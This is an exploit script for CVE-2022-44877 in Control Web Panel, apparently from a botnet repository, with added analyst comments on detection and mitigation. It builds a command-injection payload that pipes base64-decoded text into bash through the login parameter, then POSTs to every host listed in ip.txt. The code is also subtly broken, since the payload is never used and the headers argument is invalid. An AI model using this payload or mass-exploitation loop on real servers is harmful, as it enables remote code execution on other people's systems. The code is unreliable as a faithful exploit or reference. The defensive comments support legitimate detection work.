R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/Exploits/CVE-2022-44877.py
import vthread
import requests
import base64
import os
# Shell text that gets base64-encoded and substituted into the request path
# below. In this copy it is the two-byte placeholder b"hi".
command = b"hi"

# Request path for the panel's login page. The `login` query parameter holds a
# shell command substitution `$( ... )`; `${IFS}` is used wherever a space
# would normally appear, so the value contains no literal whitespace. The
# "cmdd" marker is replaced with the base64 form of `command`, and the text
# after it pipes that value through `base64 -d` into `bash`.
# The file name ties this to CVE-2022-44877, which is publicly reported
# against the login handler of Control Web Panel (CWP, formerly CentOS Web
# Panel).
# Detection: a request for /login/index.php whose `login` parameter contains
# `$(`, `${IFS}` or a base64-decode piped to a shell is a strong indicator.
# The parameter travels in the query string, so it normally shows up in web
# server access logs.
# Mitigation: install the vendor's fixed panel release and limit access to
# the panel login to trusted networks.
# NOTE(review): this string is built at import time and is not referenced
# again in the visible code.
payload = "/login/index.php?login=$(echo${IFS}cmdd${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)".replace(
    "cmdd",
    base64.b64encode(command).decode())

# Form fields passed as the POST body: a fixed username/password pair plus the
# submit-button field.
data = {"username": "root", "password": "toor", "commit": "Login"}
# Static browser-like request headers. The fixed User-Agent (Chrome 103 on
# macOS) is at best a weak secondary indicator, since it is a common browser
# string and can be changed freely.
header = {
    "Content-Type": "application/x-www-form-urlencoded",
    "User-Agent":
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
    "Accept":
    "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "en"
}
def exp(url):
    """Issue one HTTP POST to ``url`` and print a one-line status.

    ``url`` is used as given, except that ``http://`` is prepended when the
    substring "http" does not occur anywhere in it. The module-level ``data``
    dict is passed as the form body, and the call is made with
    ``verify=False``, i.e. TLS certificate validation is turned off.

    Analyst notes: the printed status reflects only whether the HTTP status
    code was 200, or that some exception was raised. It is not evidence that
    anything ran on the remote host, so output from this script should not be
    read as a list of compromised machines.
    """
    # Substring test, not a scheme check: any value containing "http" anywhere
    # is left untouched.
    if "http" not in url:
        url = "http://" + url

    try:
        r = requests.post(url, verify=False, data=data, header=header)
        if r.status_code == 200:
            print("[+] payload sent")
        else:
            print("[-] payload sent fail")
    # Bare except: every exception, not only a refused connection, ends up
    # reported with the same message.
    except:
        print("[-] connection refused")
if __name__ == "__main__":
    # Reads every line of ip.txt from the current working directory and calls
    # exp() on each stripped line, one after another. The file handle is never
    # explicitly closed.
    # Defender view: a run of this script produces a burst of near-identical
    # POSTs from one source to many hosts, with the same headers and form body.
    file = open("ip.txt").readlines()
    for ip in file:
        ip = ip.strip()
        exp(ip)